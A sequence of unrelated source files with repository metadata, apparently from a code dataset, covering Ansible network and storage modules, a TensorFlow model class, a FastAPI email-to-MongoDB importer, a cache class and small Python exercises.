target_device_node(module, target): # if anyone know a better way to find out which devicenodes get created for # a given target... devices = glob.glob('/dev/disk/by-path/*%s*' % target) devdisks = [] for dev in devices: # exclude partitions if "-part" not in dev: devdisk = os.path.realpath(dev) # only add once (multi-path?) if devdisk not in devdisks: devdisks.append(devdisk) return devdisks def target_isauto(module, target): cmd = '%s --mode node --targetname %s' % (iscsiadm_cmd, target) (rc, out, err) = module.run_command(cmd) if rc == 0: lines = out.splitlines() for line in lines: if 'node.startup' in line: return 'automatic' in line return False else: module.fail_json(cmd=cmd, rc=rc, msg=err) def target_setauto(module, target): cmd = '%s --mode node --targetname %s --op=update --name node.startup --value automatic' % (iscsiadm_cmd, target) (rc, out, err) = module.run_command(cmd) if rc > 0: module.fail_json(cmd=cmd, rc=rc, msg=err) def target_setmanual(module, target): cmd = '%s --mode node --targetname %s --op=update --name node.startup --value manual' % (iscsiadm_cmd, target) (rc, out, err) = module.run_command(cmd) if rc > 0: module.fail_json(cmd=cmd, rc=rc, msg=err) def main(): # load ansible module object module = AnsibleModule( argument_spec=dict( # target portal=dict(type='str', aliases=['ip']), port=dict(type='str', default='3260'), target=dict(type='str', aliases=['name', 'targetname']), node_auth=dict(type='str', default='CHAP'), node_user=dict(type='str'), node_pass=dict(type='str', no_log=True), # actions login=dict(type='bool', aliases=['state']), auto_node_startup=dict(type='bool', aliases=['automatic']), discover=dict(type='bool', default=False), show_nodes=dict(type='bool', default=False), ), required_together=[['discover_user', 'discover_pass'], ['node_user', 'node_pass']], supports_check_mode=True, ) global iscsiadm_cmd iscsiadm_cmd = module.get_bin_path('iscsiadm', required=True) # parameters portal = module.params['portal'] target = module.params['target'] port = module.params['port'] login = module.params['login'] automatic = module.params['auto_node_startup'] discover = module.params['discover'] show_nodes = module.params['show_nodes'] check = module.check_mode cached = iscsi_get_cached_nodes(module, portal) # return json dict result = {} result['changed'] = False if discover: if portal is None: module.fail_json(msg="Need to specify at least the portal (ip) to discover") elif check: nodes = cached else: iscsi_discover(module, portal, port) nodes = iscsi_get_cached_nodes(module, portal) if not compare_nodelists(cached, nodes): result['changed'] |= True result['cache_updated'] = True else: nodes = cached if login is not None or automatic is not None: if target is None: if len(nodes) > 1: module.fail_json(msg="Need to specify a target") else: target = nodes[0] else: # check given target is in cache check_target = False for node in nodes: if node == target: check_target = True break if not check_target: module.fail_json(msg="Specified target not found") if show_nodes: result['nodes'] = nodes if login is not None: loggedon = target_loggedon(module, target) if (login and loggedon) or (not login and not loggedon): result['changed'] |= False if login: result['devicenodes'] = target_device_node(module, target) elif not check: if login: target_login(module, target, portal, port) # give udev some time time.sleep(1) result['devicenodes'] = target_device_node(module, target) else: target_logout(module, target) result['changed'] |= True result['connection_changed'] = True else: result['changed'] |= True result['connection_changed'] = True if automatic is not None: isauto = target_isauto(module, target) if (automatic and isauto) or (not automatic and not isauto): result['changed'] |= False result['automatic_changed'] = False elif not check: if automatic: target_setauto(module, target) else: target_setmanual(module, target) result['changed'] |= True result['automatic_changed'] = True else: result['changed'] |= True result['automatic_changed'] = True module.exit_json(**result) if __name__ == '__main__': main()
31.128415
121
0.598174
4306437305398fdfa56682cb39fae32e02b7acb6
15,271
py
Python
_Dist/NeuralNetworks/e_AdvancedNN/DistNN.py
leoatchina/MachineLearning
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
[ "MIT" ]
1,107
2016-09-21T02:18:36.000Z
2022-03-29T02:52:12.000Z
_Dist/NeuralNetworks/e_AdvancedNN/DistNN.py
leoatchina/MachineLearning
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
[ "MIT" ]
18
2016-12-22T10:24:47.000Z
2022-03-11T23:18:43.000Z
_Dist/NeuralNetworks/e_AdvancedNN/DistNN.py
leoatchina/MachineLearning
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
[ "MIT" ]
776
2016-12-21T12:08:08.000Z
2022-03-21T06:12:08.000Z
import os import sys root_path = os.path.abspath("../../../") if root_path not in sys.path: sys.path.append(root_path) import math import numpy as np import tensorflow as tf from _Dist.NeuralNetworks.NNUtil import * from _Dist.NeuralNetworks.c_BasicNN.DistNN import Basic class Advanced(Basic): signature = "Advanced" def __init__(self, name=None, data_info=None, model_param_settings=None, model_structure_settings=None): self.tf_list_collections = None super(Advanced, self).__init__(name, model_param_settings, model_structure_settings) self._name_appendix = "Advanced" if data_info is None: self.data_info = {} else: assert_msg = "data_info should be a dictionary" assert isinstance(data_info, dict), assert_msg self.data_info = data_info self._data_info_initialized = False self.numerical_idx = self.categorical_columns = None self._deep_input = self._wide_input = None self._categorical_xs = None self.embedding_size = None self._embedding = self._one_hot = self._embedding_concat = self._one_hot_concat = None self._embedding_with_one_hot = self._embedding_with_one_hot_concat = None self.dropout_keep_prob = self.use_batch_norm = None self._use_wide_network = self._dndf = self._pruner = self._dndf_pruner = None self._tf_p_keep = None self._n_batch_placeholder = None @property def valid_numerical_idx(self): return np.array([ is_numerical for is_numerical in self.numerical_idx if is_numerical is not None ]) def init_data_info(self): if self._data_info_initialized: return self._data_info_initialized = True self.numerical_idx = self.data_info.get("numerical_idx", None) self.categorical_columns = self.data_info.get("categorical_columns", None) if self.numerical_idx is None: raise ValueError("numerical_idx should be provided") if self.categorical_columns is None: raise ValueError("categorical_columns should be provided") def init_from_data(self, x, y, x_test, y_test, sample_weights, names): self.init_data_info() super(Advanced, self).init_from_data(x, y, x_test, y_test, sample_weights, names) if len(self.valid_numerical_idx) != self.n_dim + 1: raise ValueError("Length of valid_numerical_idx should be {}, {} found".format( self.n_dim + 1, len(self.valid_numerical_idx) )) self.n_dim -= len(self.categorical_columns) self.model_structure_settings.setdefault("use_wide_network", self.n_dim > 0) def init_model_param_settings(self): super(Advanced, self).init_model_param_settings() self.dropout_keep_prob = float(self.model_param_settings.get("keep_prob", 0.5)) self.use_batch_norm = self.model_param_settings.get("use_batch_norm", False) def init_model_structure_settings(self): self.hidden_units = self.model_structure_settings.get("hidden_units", None) self._deep_input = self.model_structure_settings.get("deep_input", "embedding_concat") self._wide_input = self.model_structure_settings.get("wide_input", "continuous") self.embedding_size = self.model_structure_settings.get("embedding_size", 8) self._use_wide_network = self.model_structure_settings["use_wide_network"] if not self._use_wide_network: self._dndf = None else: dndf_params = self.model_structure_settings.get("dndf_params", {}) if self.model_structure_settings.get("use_dndf", True): self._dndf = DNDF(self.n_class, **dndf_params) if self.model_structure_settings.get("use_pruner", True): pruner_params = self.model_structure_settings.get("pruner_params", {}) self._pruner = Pruner(**pruner_params) if self.model_structure_settings.get("use_dndf_pruner", False): dndf_pruner_params = self.model_structure_settings.get("dndf_pruner_params", {}) self._dndf_pruner = Pruner(**dndf_pruner_params) def _get_embedding(self, i, n): embedding_size = math.ceil(math.log2(n)) + 1 if self.embedding_size == "log" else self.embedding_size embedding = tf.Variable(tf.truncated_normal( [n, embedding_size], mean=0, stddev=0.02 ), name="Embedding{}".format(i)) return tf.nn.embedding_lookup(embedding, self._categorical_xs[i], name="Embedded_X{}".format(i)) def _define_hidden_units(self): n_data = len(self._train_generator) current_units = self._deep_input.shape[1].value if current_units > 512: self.hidden_units = [1024, 1024] elif current_units > 256: if n_data >= 10000: self.hidden_units = [1024, 1024] else: self.hidden_units = [2 * current_units, 2 * current_units] else: if n_data >= 100000: self.hidden_units = [768, 768] elif n_data >= 10000: self.hidden_units = [512, 512] else: self.hidden_units = [2 * current_units, 2 * current_units] def _fully_connected_linear(self, net, shape, appendix): with tf.name_scope("Linear{}".format(appendix)): w = init_w(shape, "W{}".format(appendix)) if self._pruner is not None: w = self._pruner.prune_w(*self._pruner.get_w_info(w)) b = init_b([shape[1]], "b{}".format(appendix)) self._ws.append(w) self._bs.append(b) return tf.add(tf.matmul(net, w), b, name="Linear{}_Output".format(appendix)) def _build_layer(self, i, net): if self.use_batch_norm: net = tf.layers.batch_normalization(net, training=self._is_training, name="BN{}".format(i)) activation = self.activations[i] if activation is not None: net = getattr(Activations, activation)(net, "{}{}".format(activation, i)) if self.dropout_keep_prob < 1: net = tf.nn.dropout(net, keep_prob=self._tf_p_keep) return net def _build_model(self, net=None): super(Advanced, self)._build_model(self._deep_input) if self._use_wide_network: if self._dndf is None: wide_output = self._fully_connected_linear( self._wide_input, appendix="_wide_output", shape=[self._wide_input.shape[1].value, self.n_class] ) else: wide_output = self._dndf( self._wide_input, self._n_batch_placeholder, pruner=self._dndf_pruner ) self._output += wide_output def _get_feed_dict(self, x, y=None, weights=None, is_training=True): continuous_x = x[..., self.valid_numerical_idx[:-1]] if self._categorical_xs else x feed_dict = super(Advanced, self)._get_feed_dict(continuous_x, y, weights, is_training) if self._dndf is not None: feed_dict[self._n_batch_placeholder] = len(x) if self._pruner is not None: cond_placeholder = self._pruner.cond_placeholder if cond_placeholder is not None: feed_dict[cond_placeholder] = True if self._dndf is not None and self._dndf_pruner is not None: cond_placeholder = self._dndf_pruner.cond_placeholder if cond_placeholder is not None: feed_dict[cond_placeholder] = True for (idx, _), categorical_x in zip(self.categorical_columns, self._categorical_xs): feed_dict.update({categorical_x: x[..., idx].astype(np.int32)}) return feed_dict def _define_input_and_placeholder(self): super(Advanced, self)._define_input_and_placeholder() if not self.categorical_columns: self._categorical_xs = [] self._one_hot = self._one_hot_concat = self._tfx self._embedding = self._embedding_concat = self._tfx self._embedding_with_one_hot = self._embedding_with_one_hot_concat = self._tfx else: all_categorical = self.n_dim == 0 with tf.name_scope("Categorical_Xs"): self._categorical_xs = [ tf.placeholder(tf.int32, shape=[None], name="Categorical_X{}".format(i)) for i in range(len(self.categorical_columns)) ] with tf.name_scope("One_hot"): one_hot_vars = [ tf.one_hot(self._categorical_xs[i], n) for i, (_, n) in enumerate(self.categorical_columns) ] self._one_hot = self._one_hot_concat = tf.concat(one_hot_vars, 1, name="Raw") if not all_categorical: self._one_hot_concat = tf.concat([self._tfx, self._one_hot], 1, name="Concat") with tf.name_scope("Embedding"): embeddings = [ self._get_embedding(i, n) for i, (_, n) in enumerate(self.categorical_columns) ] self._embedding = self._embedding_concat = tf.concat(embeddings, 1, name="Raw") if not all_categorical: self._embedding_concat = tf.concat([self._tfx, self._embedding], 1, name="Concat") with tf.name_scope("Embedding_with_one_hot"): self._embedding_with_one_hot = self._embedding_with_one_hot_concat = tf.concat( embeddings + one_hot_vars, 1, name="Raw" ) if not all_categorical: self._embedding_with_one_hot_concat = tf.concat( [self._tfx, self._embedding_with_one_hot], 1, name="Concat" ) if self._wide_input == "continuous": self._wide_input = self._tfx else: self._wide_input = getattr(self, "_" + self._wide_input) if self._deep_input == "continuous": self._deep_input = self._tfx else: self._deep_input = getattr(self, "_" + self._deep_input) if self.hidden_units is None: self._define_hidden_units() self._tf_p_keep = tf.cond( self._is_training, lambda: self.dropout_keep_prob, lambda: 1., name="keep_prob" ) self._n_batch_placeholder = tf.placeholder(tf.int32, name="n_batch") def _define_py_collections(self): super(Advanced, self)._define_py_collections() self.py_collections += ["data_info", "numerical_idx", "categorical_columns"] def _define_tf_collections(self): super(Advanced, self)._define_tf_collections() self.tf_collections += [ "_deep_input", "_wide_input", "_n_batch_placeholder", "_embedding", "_one_hot", "_embedding_with_one_hot", "_embedding_concat", "_one_hot_concat", "_embedding_with_one_hot_concat" ] self.tf_list_collections = ["_categorical_xs"] def add_tf_collections(self): super(Advanced, self).add_tf_collections() for tf_list in self.tf_list_collections: target_list = getattr(self, tf_list) if target_list is None: continue for tensor in target_list: tf.add_to_collection(tf_list, tensor) def restore_collections(self, folder): for tf_list in self.tf_list_collections: if tf_list is not None: setattr(self, tf_list, tf.get_collection(tf_list)) super(Advanced, self).restore_collections(folder) def clear_tf_collections(self): super(Advanced, self).clear_tf_collections() for key in self.tf_list_collections: tf.get_collection_ref(key).clear() def print_settings(self, only_return=False): msg = "\n".join([ "=" * 100, "This is a {}".format( "{}-classes problem".format(self.n_class) if not self.n_class == 1 else "regression problem" ), "-" * 100, "Data : {} training samples, {} test samples".format( len(self._train_generator), len(self._test_generator) if self._test_generator is not None else 0 ), "Features : {} categorical, {} numerical".format( len(self.categorical_columns), np.sum(self.valid_numerical_idx) ) ]) + "\n" msg += "=" * 100 + "\n" msg += "Deep model: DNN\n" msg += "Deep model input: {}\n".format( "Continuous features only" if not self.categorical_columns else "Continuous features with embeddings" if np.any(self.numerical_idx) else "Embeddings only" ) msg += "-" * 100 + "\n" if self.categorical_columns: msg += "Embedding size: {}\n".format(self.embedding_size) msg += "Actual feature dimension: {}\n".format(self._embedding_concat.shape[1].value) msg += "-" * 100 + "\n" if self.dropout_keep_prob < 1: msg += "Using dropout with keep_prob = {}\n".format(self.dropout_keep_prob) else: msg += "Training without dropout\n" msg += "Training {} batch norm\n".format("with" if self.use_batch_norm else "without") msg += "Hidden units: {}\n".format(self.hidden_units) msg += "=" * 100 + "\n" if not self._use_wide_network: msg += "Wide model: None\n" else: msg += "Wide model: {}\n".format("logistic regression" if self._dndf is None else "DNDF") msg += "Wide model input: Continuous features only\n" msg += "-" * 100 + '\n' if self._dndf is not None: msg += "Using DNDF with n_tree = {}, tree_depth = {}\n".format( self._dndf.n_tree, self._dndf.tree_depth ) msg += "\n".join(["=" * 100, "Hyper parameters", "-" * 100, "{}".format( "This is a DNN model" if self._dndf is None and not self._use_wide_network else "This is a Wide & Deep model" if self._dndf is None else "This is a hybrid model" ), "-" * 100]) + "\n" msg += "Activation : " + str(self.activations) + "\n" msg += "Batch size : " + str(self.batch_size) + "\n" msg += "Epoch num : " + str(self.n_epoch) + "\n" msg += "Optimizer : " + self._optimizer_name + "\n" msg += "Metric : " + self._metric_name + "\n" msg += "Loss : " + self._loss_name + "\n" msg += "lr : " + str(self.lr) + "\n" msg += "-" * 100 + "\n" msg += "Pruner : {}".format("None" if self._pruner is None else "") + "\n" if self._pruner is not None: msg += "\n".join("-> {:14}: {}".format(key, value) for key, value in sorted( self._pruner.params.items() )) + "\n" msg += "-" * 100 return msg if only_return else self.log_msg( "\n" + msg, logger=self.get_logger("print_settings", "general.log"))
46.700306
112
0.603431
60cc8fde5298eb8b2ba7eb219e5f4d8541b683fd
4,515
py
Python
import-emails-api-docker/main.py
Zeno-Paukner/cellarius
904b88c6dc33cf4ec2f6d70d3e1acf175b11967a
[ "Unlicense" ]
1
2021-12-06T20:29:28.000Z
2021-12-06T20:29:28.000Z
import-emails-api-docker/main.py
Zeno-Paukner/cellarius
904b88c6dc33cf4ec2f6d70d3e1acf175b11967a
[ "Unlicense" ]
null
null
null
import-emails-api-docker/main.py
Zeno-Paukner/cellarius
904b88c6dc33cf4ec2f6d70d3e1acf175b11967a
[ "Unlicense" ]
null
null
null
import os from imap_tools import MailBox, AND import pymongo from pydantic import BaseModel from fastapi import FastAPI from bs4 import BeautifulSoup import uvicorn app = FastAPI() #check if rest api is running print("Rest-Server running") # create class ImportEmails with imap_username imap_password imap_server_url mongodb_connection_string collection_name class ImportEmails(BaseModel): imap_username: str = os.environ.get('IMAP_PALIDO_USERNAME') imap_password: str = os.environ.get('IMAP_PALIDO_EMAIL_PASSWORD') imap_server_url: str = os.environ.get('IMAP_PALIDO_SERVER') mongodb_connection_string: str = os.environ.get('ME_CONFIG_MONGODB_URL') collection_name: str = os.environ.get('IMPORT_EMAILS_MONGODB_COLLECTION_NAME') def scrape_emails(ImportEmails): # create a mongodb connection ImportEmails.imap_password = os.environ.get('IMAP_PALIDO_EMAIL_PASSWORD') ImportEmails.imap_username = os.environ.get('IMAP_PALIDO_USERNAME') ImportEmails.mongodb_connection_string = os.environ.get('ME_CONFIG_MONGODB_URL') ImportEmails.collection_name = os.environ.get('IMPORT_EMAILS_MONGODB_COLLECTION_NAME') ImportEmails.imap_server_url = os.environ.get('IMAP_PALIDO_SERVER') # connect to mongodb # if ImportEmails.imap_username == "username" then use os.environ.get('IMAP_PALIDO_USERNAME') # if ImportEmails.imap_password == "password" then use os.environ.get('IMAP_PALIDO_PASSWORD') #if(ImportEmails.imap_username == "username"): # ImportEmails.imap_username = os.environ.get('IMAP_PALIDO_USERNAME') #if(ImportEmails.imap_password == "password"): # ImportEmails.imap_password = os.environ.get('IMAP_PALIDO_PASSWORD') myclient = pymongo.MongoClient(ImportEmails.mongodb_connection_string) #check if mongodb is connected if myclient: print("MongoDB is connected") print("Connected with: " + str(ImportEmails.mongodb_connection_string)) mydb = myclient["Cellarius"] print("Connected to MongoDB") # create collection with name collection_name from ImportEmails # TODO: the collection name is allways "None" it should be the name of the ImportEmails.collection_name var col = "imported_emails" collection = mydb[col] print("Open collection :" + collection.name) #if the collection allready exists then stop the def print(collection.count_documents({})) # if the collection has more then one document then stop the def if collection.count_documents({}) > 1: print("Collection has more then one document") return # print out current collectionname print("Collection created:" + collection.name) #print("Start scraping emails from:") #print(str(ImportEmails.imap_server_url)) #print(str(ImportEmails.imap_username)) mailbox = MailBox(str(ImportEmails.imap_server_url)) mailbox.login(str(ImportEmails.imap_username), str(ImportEmails.imap_password), initial_folder='INBOX') c = 0 for msg in mailbox.fetch(AND(all=True)): soup = BeautifulSoup(msg.html, 'html.parser') email_texts = soup.get_text().split('Von:') email_texts_parsed = [] for e in email_texts: text = (''.join(list(filter(None, e.split('\n'))))) email_texts_parsed.append(text) email_conversation = { "uid": msg.uid, "subject": msg.subject, "from": msg.from_, "to": msg.to, "html": msg.html, "email_texts" : email_texts_parsed, "data_status": 0 } c = c + 1 x = collection.insert_one(email_conversation) print ("Saved:", c, msg.uid, msg.subject) mailbox.logout() print("Finished scraping emails") # run ImportEmails scrape_emails #scrape_emails(ImportEmails) #create a post req to fill class ImportEmails @app.post("/start-import-emails") async def import_emails(input: ImportEmails): #if the Input is empty fill in the os.environ scrape_emails(ImportEmails) return "OK" @app.get("/") async def root(): return {"message": "Hello World"} #uvicorn.run(app, host="0.0.0.0", port=8000) uvicorn.run(app, host="0.0.0.0", port=8000, root_path="/cellarius/import-emails")
36.41129
118
0.66711
71e1fc0892b74520084fc5cc7410f69346dd3218
479
py
Python
___Python/Thomas/pycurs_180625/p07_file_io/m01_count_files.py
uvenil/PythonKurs201806
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
[ "Apache-2.0" ]
null
null
null
___Python/Thomas/pycurs_180625/p07_file_io/m01_count_files.py
uvenil/PythonKurs201806
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
[ "Apache-2.0" ]
null
null
null
___Python/Thomas/pycurs_180625/p07_file_io/m01_count_files.py
uvenil/PythonKurs201806
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
[ "Apache-2.0" ]
null
null
null
from pathlib import Path # Zähle die Anzahle Ordner in einem Ordner (inkl. Unetrordner) def count_dirs(path): try: subdirs = [subdir for subdir in path.iterdir() if subdir.is_dir()] # Unterordner dieses Verzeichnis count = 1 for subdir in subdirs: count += count_dirs(subdir) return count except PermissionError: return 1 count = count_dirs(Path("O:\Spielwiese")) print(count) #problem interative
25.210526
108
0.643006
46080f0351429e6f033ebda794d228d6c1c01157
5,905
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/onyx_aaa.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/onyx_aaa.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/onyx_aaa.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
#!/usr/bin/python # # Copyright: Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: onyx_aaa author: "Sara Touqan (@sarato)" short_description: Configures AAA parameters description: - This module provides declarative management of AAA protocol params on Mellanox ONYX network devices. options: tacacs_accounting_enabled: description: - Configures accounting settings. type: bool auth_default_user: description: - Sets local user default mapping. type: str choices: ['admin', 'monitor'] auth_order: description: - Sets the order on how to handle remote to local user mappings. type: str choices: ['local-only', 'remote-first', 'remote-only'] auth_fallback_enabled: description: - Enables/Disables fallback server-err option. type: bool ''' EXAMPLES = """ - name: configures aaa onyx_aaa: tacacs_accounting_enabled: yes auth_default_user: monitor auth_order: local-only auth_fallback_enabled: false """ RETURN = """ commands: description: The list of configuration mode commands to send to the device. returned: always type: list sample: - aaa accounting changes default stop-only tacacs+ - no aaa accounting changes default stop-only tacacs+ - aaa authorization map default-user <user> - aaa authorization map order <order> - aaa authorization map fallback server-err - no aaa authorization map fallback server-err """ import re from ansible.module_utils.basic import AnsibleModule from ansible_collections.community.general.plugins.module_utils.network.onyx.onyx import show_cmd from ansible_collections.community.general.plugins.module_utils.network.onyx.onyx import BaseOnyxModule class OnyxAAAModule(BaseOnyxModule): def init_module(self): """ initialize module """ element_spec = dict( tacacs_accounting_enabled=dict(type='bool'), auth_default_user=dict(type='str', choices=['admin', 'monitor']), auth_order=dict(type='str', choices=['local-only', 'remote-first', 'remote-only']), auth_fallback_enabled=dict(type='bool') ) argument_spec = dict() argument_spec.update(element_spec) self._module = AnsibleModule( argument_spec=argument_spec, supports_check_mode=True) def get_required_config(self): module_params = self._module.params self._required_config = dict(module_params) self.validate_param_values(self._required_config) def _set_aaa_config(self, all_aaa_config): aaa_config = all_aaa_config[0] self._current_config['auth_default_user'] = aaa_config.get("Default User") self._current_config['auth_order'] = aaa_config.get("Map Order") auth_fallback_enabled = aaa_config.get("Fallback on server-err") if auth_fallback_enabled == "yes": self._current_config['auth_fallback_enabled'] = True else: self._current_config['auth_fallback_enabled'] = False aaa_config_2 = all_aaa_config[2] accounting_message = aaa_config_2.get("message") if accounting_message == "No accounting methods configured.": self._current_config['tacacs_accounting_enabled'] = False else: self._current_config['tacacs_accounting_enabled'] = True def _show_aaa_config(self): cmd = "show aaa" return show_cmd(self._module, cmd, json_fmt=True, fail_on_error=False) def load_current_config(self): self._current_config = dict() aaa_config = self._show_aaa_config() if aaa_config: self._set_aaa_config(aaa_config) def generate_commands(self): tacacs_accounting_enabled = self._required_config.get("tacacs_accounting_enabled") if tacacs_accounting_enabled is not None: current_accounting_enabled = self._current_config.get("tacacs_accounting_enabled") if current_accounting_enabled != tacacs_accounting_enabled: if tacacs_accounting_enabled is True: self._commands.append('aaa accounting changes default stop-only tacacs+') else: self._commands.append('no aaa accounting changes default stop-only tacacs+') auth_default_user = self._required_config.get("auth_default_user") if auth_default_user is not None: current_user = self._current_config.get("auth_default_user") if current_user != auth_default_user: self._commands.append('aaa authorization map default-user {0}' .format(auth_default_user)) auth_order = self._required_config.get("auth_order") if auth_order is not None: current_order = self._current_config.get("auth_order") if current_order != auth_order: self._commands.append('aaa authorization map order {0}' .format(auth_order)) auth_fallback_enabled = self._required_config.get("auth_fallback_enabled") if auth_fallback_enabled is not None: current_fallback = self._current_config.get("auth_fallback_enabled") if current_fallback != auth_fallback_enabled: if auth_fallback_enabled is True: self._commands.append('aaa authorization map fallback server-err') else: self._commands.append('no aaa authorization map fallback server-err') def main(): """ main entry point for module execution """ OnyxAAAModule.main() if __name__ == '__main__': main()
36.677019
106
0.682642
e804af1034061f2f104d2ffe58eec14a7bc29868
88
py
Python
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 26/26.py
jaswinder9051998/Resources
fd468af37bf24ca57555d153ee64693c018e822e
[ "MIT" ]
101
2021-12-20T11:57:11.000Z
2022-03-23T09:49:13.000Z
50-Python-Exercises/Exercises/Exercise 26/26.py
kuwarkapur/Hacktoberfest-2022
efaafeba5ce51d8d2e2d94c6326cc20bff946f17
[ "MIT" ]
4
2022-01-12T11:55:56.000Z
2022-02-12T04:53:33.000Z
50-Python-Exercises/Exercises/Exercise 26/26.py
kuwarkapur/Hacktoberfest-2022
efaafeba5ce51d8d2e2d94c6326cc20bff946f17
[ "MIT" ]
38
2022-01-12T11:56:16.000Z
2022-03-23T10:07:52.000Z
#Make a script that prints out numbers from 1 to 10 for i in range(1,11): print(i)
17.6
51
0.681818
e826dce0a2efec3777ab49d67c529dd9c42675ca
2,811
py
Python
packages/watchmen-data-kernel/src/watchmen_data_kernel/cache/topic_cache.py
Indexical-Metrics-Measure-Advisory/watchmen
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
[ "MIT" ]
null
null
null
packages/watchmen-data-kernel/src/watchmen_data_kernel/cache/topic_cache.py
Indexical-Metrics-Measure-Advisory/watchmen
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
[ "MIT" ]
null
null
null
packages/watchmen-data-kernel/src/watchmen_data_kernel/cache/topic_cache.py
Indexical-Metrics-Measure-Advisory/watchmen
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
[ "MIT" ]
null
null
null
from typing import List, Optional from watchmen_data_kernel.storage import TopicDataEntityHelper from watchmen_data_kernel.topic_schema import TopicSchema from watchmen_model.admin import Topic from watchmen_model.common import TenantId, TopicId from .cache_manager import get_topic_by_id_cache, get_topic_by_tenant_and_name_cache, \ get_topic_entity_helper_by_id_cache, get_topic_schema_by_id_cache from .internal_cache import InternalCache from .pipeline_by_topic_cache import pipeline_by_topic_cache class TopicCache: def __init__(self): self.byIdCache = InternalCache(cache=get_topic_by_id_cache) self.byTenantAndNameCache = InternalCache(cache=get_topic_by_tenant_and_name_cache) self.schemaByIdCache = InternalCache(cache=get_topic_schema_by_id_cache) self.entityHelperByIdCache = InternalCache(cache=get_topic_entity_helper_by_id_cache) # noinspection PyMethodMayBeStatic def to_tenant_and_name_key(self, name: str, tenant_id: TenantId) -> str: return f'{tenant_id}-{name}' def put(self, topic: Topic) -> Optional[Topic]: # topic is changed, remove from entity helper cache anyway self.entityHelperByIdCache.remove(topic.topicId) # refresh other caches existing_topic = self.byIdCache.put(topic.topicId, topic) self.byTenantAndNameCache.put( self.to_tenant_and_name_key(topic.name, topic.tenantId), topic) self.schemaByIdCache.put(topic.topicId, TopicSchema(topic)) return existing_topic def put_entity_helper(self, entity_helper: TopicDataEntityHelper) -> Optional[TopicDataEntityHelper]: return self.entityHelperByIdCache.put(entity_helper.get_topic().topicId, entity_helper) def get(self, topic_id: TopicId) -> Optional[Topic]: return self.byIdCache.get(topic_id) def get_schema(self, topic_id: TopicId) -> Optional[TopicSchema]: return self.schemaByIdCache.get(topic_id) def get_entity_helper(self, topic_id: TopicId) -> Optional[TopicDataEntityHelper]: return self.entityHelperByIdCache.get(topic_id) def get_by_name(self, name: str, tenant_id: TenantId) -> Optional[Topic]: return self.byTenantAndNameCache.get(self.to_tenant_and_name_key(name, tenant_id)) def remove(self, topic_id: TopicId) -> Optional[Topic]: existing: Optional[Topic] = self.byIdCache.remove(topic_id) if existing is not None: pipeline_by_topic_cache.remove(topic_id) self.byTenantAndNameCache.remove(self.to_tenant_and_name_key(existing.name, existing.tenantId)) self.schemaByIdCache.remove(topic_id) self.entityHelperByIdCache.remove(topic_id) return existing def all(self) -> List[Topic]: return list(self.byIdCache.values()) def clear(self) -> None: self.byIdCache.clear() self.byTenantAndNameCache.clear() self.schemaByIdCache.clear() self.entityHelperByIdCache.clear() pipeline_by_topic_cache.clear() topic_cache = TopicCache()
40.157143
102
0.811811
c7742d037fbfa87807fd9419663afe8f98d4b927
1,087
py
Python
Beginner/03. Python/remove_duplicates.py
ankita080208/Hacktoberfest
2be849e89285260e7b6672f42979943ad6bbec78
[ "MIT" ]
3
2021-03-16T16:44:04.000Z
2021-06-07T17:32:51.000Z
Beginner/03. Python/remove_duplicates.py
ankita080208/Hacktoberfest
2be849e89285260e7b6672f42979943ad6bbec78
[ "MIT" ]
null
null
null
Beginner/03. Python/remove_duplicates.py
ankita080208/Hacktoberfest
2be849e89285260e7b6672f42979943ad6bbec78
[ "MIT" ]
1
2020-10-26T08:44:01.000Z
2020-10-26T08:44:01.000Z
''' Given an input of a 2D array of integers, removes all duplicates from the array. Empty sub-arrays are removed. ''' map = {} def remove_duplicates(all_nums): end_index = len(all_nums) #length of all_nums i = 0 #current index of all_nums while(i < end_index): j = 0 #current index of sub-array sub_arr = all_nums[i] sub_end = len(sub_arr) while(j < sub_end): if(map.get(sub_arr[j]) != None): sub_end = sub_end - 1 #decrease length of sub_arr due removal sub_arr.remove(sub_arr[j]) if(len(all_nums[i]) == 0): end_index = end_index - 1 #decrease length of all_nums due to empty array removal all_nums.remove(all_nums[i]) i = i - 1 continue else: print("No",sub_arr[j],"found in map.") map[sub_arr[j]] = 1 j = j + 1 i = i + 1 print(all_nums) arr = [[1, 2], [2, 2, 2, 2, 2], [2, 3], [4, 5, 2, 2, 2], [3, 3, 3, 4]] remove_duplicates(arr)
31.970588
101
0.522539
1bfcbe98a563233e76cce2f48c46d13e30ac670b
5,222
py
Python
code/snake/Visualization.py
BogyMitutoyoCTL/AI-Preparation
ef535741816b02e5e63d426a3232a688c9abd726
[ "MIT" ]
1
2020-03-30T09:25:53.000Z
2020-03-30T09:25:53.000Z
code/snake/Visualization.py
BogyMitutoyoCTL/AI-Preparation
ef535741816b02e5e63d426a3232a688c9abd726
[ "MIT" ]
2
2020-02-05T14:00:23.000Z
2020-03-30T19:57:19.000Z
code/snake/Visualization.py
BogyMitutoyoCTL/AI-Preparation
ef535741816b02e5e63d426a3232a688c9abd726
[ "MIT" ]
null
null
null
